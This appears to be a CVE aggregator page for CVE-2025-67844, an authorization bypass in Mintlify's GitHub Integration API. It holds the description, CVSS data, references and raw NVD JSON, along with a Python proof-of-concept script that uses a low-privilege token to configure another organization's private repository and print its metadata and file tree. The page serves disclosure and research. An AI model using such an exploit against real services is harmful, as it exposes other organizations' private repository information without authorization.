CVE-2025-67844

Description

The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization.

CVSS Details

CVSS Score

5.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:* - VULNERABLE

Mintlify Platform < 2025-11-15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-67844 PoC - Mintlify GitHub Integration API Authorization Bypass
# This PoC demonstrates how an attacker with low-privilege access can obtain
# sensitive repository metadata from any GitHub repository through Mintlify's API

import requests
import json

TARGET_HOST = "https://api.mintlify.com"  # Replace with actual Mintlify instance
ATTACKER_TOKEN = "attacker_low_privilege_token"  # Valid low-privilege user token

def exploit_mintlify_github_integration():
    """
    Exploit unauthorized repository metadata access via GitHub Integration API
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    
    # Target repository that does NOT belong to attacker's organization
    target_owner = "target-organization"
    target_repo = "private-sensitive-repo"
    
    # Step 1: Configure GitHub integration with arbitrary repository
    payload = {
        "github_config": {
            "repository_owner": target_owner,
            "repository_name": target_repo,
            "branch": "main"
        }
    }
    
    # Step 2: Trigger metadata retrieval (bypassing installation ID validation)
    response = requests.post(
        f"{TARGET_HOST}/integrations/github/configure",
        headers=headers,
        json=payload
    )
    
    # Step 3: Extract sensitive repository metadata
    if response.status_code == 200:
        metadata = response.json()
        print("[+] Successfully obtained repository metadata:")
        print(f"  - Repository: {metadata.get('full_name')}")
        print(f"  - Description: {metadata.get('description')}")
        print(f"  - Visibility: {metadata.get('private')}")
        print(f"  - Default branch: {metadata.get('default_branch')}")
        print(f"  - Languages: {metadata.get('language')}")
        print(f"  - File tree: {metadata.get('file_tree')}")
        return metadata
    else:
        print(f"[-] Failed: {response.status_code}")
        return None

if __name__ == "__main__":
    exploit_mintlify_github_integration()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67844
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67844
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67844/
[4] VulDB https://vuldb.com/cve/CVE-2025-67844
[5] https://kibty.town/blog/mintlify/
[6] https://news.ycombinator.com/item?id=46317098
[7] https://www.mintlify.com/blog/working-with-security-researchers-november-2025
[8] https://www.mintlify.com/docs/changelog

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67844", "sourceIdentifier": "[email protected]", "published": "2025-12-19T02:16:09.147", "lastModified": "2026-01-02T16:10:46.363", "vulnStatus": "Analyzed", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["exclusively-hosted-service"]}], "descriptions": [{"lang": "en", "value": "The GitHub Integration API in Mintlify Platform before 2025-11-15 allows remote attackers to obtain sensitive repository metadata via the repository owner and name fields. It fails to validate that the repository owner and name fields provided during configuration belong to the specific GitHub App Installation ID associated with the user's organization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-425"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintlify:mintlify:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-11-15", "matchCriteriaId": "4E599124-4B00-4D5C-ADB5-EC4564D3E5BF"}]}]}], "references": [{"url": "https://kibty.town/blog/mintlify/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://news.ycombinator.com/item?id=46317098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://www.mintlify.com/blog/working-with-security-researchers-november-2025", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mintlify.com/docs/changelog", "source": "[email protected]", "tags": ["Release Notes"]}]}}